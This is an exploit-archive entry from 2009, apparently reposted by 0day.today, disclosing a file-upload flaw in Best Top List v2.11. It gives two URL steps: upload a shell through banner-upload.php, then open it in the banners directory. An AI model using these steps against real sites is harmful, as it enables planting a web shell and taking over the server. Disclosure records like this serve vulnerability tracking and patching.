id: 10435
date: 12/26/2009
title: Best Top List v2.11 Upload Shell Vulnerability
author: indoushka
cves: 

==============================================
Best Top List v2.11 Upload Shell Vulnerability
==============================================

========================================================================================                 
| # Title    : Best Top List Upload Shell Vulnerability                                |
| # Author   : indoushka                                                               |
| # Script   : Powered by Best Top List by Szymon Kosok v. 2.11           
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : Upload Shell                                                            |
======================      Exploit By indoushka       =================================
| # Exploit  :
| 1- http://server/toplist/banner-upload.php =>up u Ev!l
|
| 2- http://server/toplist/banners/sqd/c.php => Find It



#  0day.today [2023-03-24]  #